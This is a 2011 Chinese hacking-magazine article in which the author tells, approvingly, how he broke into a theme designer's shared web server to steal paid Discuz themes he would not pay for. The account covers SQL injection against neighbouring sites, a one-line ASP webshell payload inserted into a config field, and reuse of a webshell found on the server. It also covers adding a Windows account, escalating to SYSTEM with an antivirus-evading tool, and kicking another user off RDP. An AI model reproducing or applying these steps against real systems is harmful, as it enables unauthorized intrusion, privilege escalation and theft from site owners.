BY：rices

此文刊登于《黑客X档案》2011年5月，版权归杂志所有，以下是整个文章的原稿，我就不多整理了。

最近一直想着捣鼓一个论坛，正好过年收了点压岁钱，所以就去淘宝买了个vps。高高兴兴的把论坛架设起来了，却为找不到好的主题烦恼。就叫周围的朋友帮忙找找，最后一个哥们找到了一款让我觉得近乎完美的主题，他把作者博客地址发给我一看，我才知道是收费的主题，一看价格，我的吗呀！要1千大洋，图1：

这哪是我等穷人买的起的，就连一个演示都木有。于是有了进入他站点盗取主题文件的想法，虽然他的博客里面不一定放着这套主题文件，但是挂个txt泻泻愤也是很爽的嘿嘿，说干就干，于是这次蛋疼的拿主题之旅就开始了。

一.踩点

打开作者的主页www.2cto.com（代替目标网址），简单的收集了下信息，一个主站，主站
点是纯flash的，做的很漂亮，看来是个做主题的高手啊，跟目录下的blog文件夹是作者的blog，看了下页脚，发现是pjblog，如图2：

试了下09年的注入漏洞发现已经修复了，手上也没有pjblog的0day，所以从blog就不好下手了，首页就更不用说了。全flash的，最后拿出破壳扫目录挣扎下，结果也是不如人意。看来从主站是不行了，那么就来旁注吧。

二.进攻

打开http://rootkit.net.cn/index.aspx查了下，同服务器有20多个站点,如图3:

随便打开了几个站,发现是aspx的,找到带参数的连接后面加单引号测试,发现提示模版不存在,看来没有注入漏洞,而且几个站都是同一个系统,如图4:

继续搜索目标,找到一个asp站点,简单测试了下,发现注入也被过滤了，正当我准备换下一个站的时候在这个站的首页发现他的sz目录下还有一个站点。进去一看和主站是不同的风格，随便找一个带参数的链接在后面加上单引号测试，发现爆错了。如图5：

看提示就知道是很典型的注入漏洞了，祭出我们的啊D大神，几分钟后把账号和密码跑了出来，如图6：

账号是“biaogan”，密码是md5加密的到cmd5查了下，结果为admin888。接着顺便用啊D来跑下后台吧，结果扫描到后台为admin/login.asp，高高兴兴的把账号和密码输进去后猛击回车，却给我来个密码错误！如图7：

这下可把我给搞郁闷了，难道啊D出问题了不成？为了这明这个猜想，我用穿山甲又跑了一遍，也是这个结果，难道是后台做了手脚？或者说这个是假的后台？我马上拿出破壳扫描器对网站一顿狂扫 ，结果证实了我这个猜想，如图8：

打开/houtai/admin.asp后发现和前面那个页面一模一样，用前面跑出来的账号和密码尝试登录，这次登录成功了，看来管理员安全意识还是有点的，留了个后手。进入后台看了下，没有数据库备份，有上传的地方，但是类型已经过滤了，尝试上传.asp;.jpg格式的小马，发现要重命名，又把我郁闷了。突然看到网站基本信息一栏，和南方数据很相似，是否可以插马呢？这里说下南方数据后台插入一句话木马，由于该系统把网站配置信息写入到inc/config.asp 文件，所以可以直接写入闭合型一句话木马，我直接访问inc/config.asp文件，出现一片空白，说明这个文件存在，但是后台又不像是南方数据，可能是改过的吧。我直接在网站信息里面的联络电话处插入闭合型一句话木马 “%><%eval request(“x”)%><%Const nidaye=”。如图9：

保存以后菜刀连接inc/config.asp，正心里想终于拿下了的时候菜刀却提示连接失败！郁闷了，现在也没有这套系统的源码，所以也不知道他的配置文件格式是怎么样的，看来这个网站又要放弃了。夜也深了，熬夜伤身体，索性就明天来搞把。在床上看着x慢慢就睡着了。

三.曙光

第二天早上起来头脑清醒了很多，继续寻找下一个目标，这次我也不急。一边吃东西一

边一个个站的仔细检查，一边开着扫描器扫描其他网站的敏感文件，当检查列表最后一个aspx站点的时候发现提交单引号爆错了，如图10:

分别在后面添加 and 1=1 和 and 1=2 发现返回了不同页面，马上丢啊D里面跑去了，啊D却提示不能注入，我可是一个正宗的tools boy 啊。继续换穿山甲来检测，穿山甲也提示不能注入，郁闷死了，这鸟运气。于是烦躁的关掉工具，这时发现扫描器还在扫描着一个站点随便看了下扫描出来的后台，用admin admin888等弱口令都进不去，突然看到工具扫到了editor/admin_style.asp 这个文件，难道有ewebeditor吗？我马上点进去却震惊了。竟然是个webshell！如图11：

看到这里可能有的读者会说一个shell你激动什么，你也不知道人家密码啊。不瞒您说，我还就真知道这个shell的密码。在半年前渗透我学校网站的时候也发现过这个shell，当时对这个背景图片印象很深，所以第一眼我就反映过来了。利马翻出我学校的后门上去找到了当时看到的那个shell，发现和现在这个确实是同一个，如图12

刚才还抱怨运气不好，现在这好运气又让我给撞上了，拿找到的密码774677770成功登陆刚才扫出来的shell，如图13：

四.胜利

马上查了下组建，发现ws组建没有被删除，提权希望很大啊，发现所有文件都可以浏览，索性我直接进入那个主题作者的网站目录，却发现没有权限，本来我还想传个aspx木马看可以跨过去不的，但是想想还是先看看能提权不吧。用shell的查看可写目录查看了下c盘，如图14：

马上传个cmd到RECYCLER目录，其他可写目录也可以，只不过我习惯了这个目录传。传上去以后执行netstat –an命令看了下端口，发现3389开着，接着执行 net user rices 123 /add 发现没有回显，看来没有执行成功。继续传个无参pr上去，执行后返回空白，再去目录看了下发现被删了，看来有杀毒软件，找朋友要了个免杀的pr传了上去这次成功添加了~如图15:

用户已经加上了马上登录3389，结果却提示我超出连接限制，如图16：

看来是连接3389的人多了，继续回到shell执行命令query user来查看下当前连接3389的用户，如图17：

有一个strattes的用户，我们就T了他吧，继续输入命令logoff 2，2为目标用户的ID，ID在图17中可以清楚的看到，但是却返回空，再执行下query user发现strattes用户还是连接着，看来是没有权限，这样的话就传个pr上去吧（先添加用户是传的无参数版pr，不能执行命令）。传上去以后执行C:\RECYCLER\pr.exe ”logoff 2″，执行成功了（pr是system权限）。再执行下query user看看，发现strattes用户已经被T了，如图18：

接着连接3389成功登录，找到那个主题作者的网站，找了下没有看见主题的影子，继续翻。发现在他的homehomeoo\bbs目录下是一个discuz论坛（我要找的也是discuz的主题）马上转到discuz的主题文件夹templates，找到了我梦寐以求的主题，而且还有很多套作者收费的主题，如图19：

五.结束

经过长久的战斗，总算是拿到了自己想要的主题，这次渗透运气的成分占多，但是如果没有坚持而是放弃的话，也就没有后面所谓的运气了。不管遇到任何站点的时候多一点耐心，有时候看似费时的扫描也许会给你带来意想不到的收获！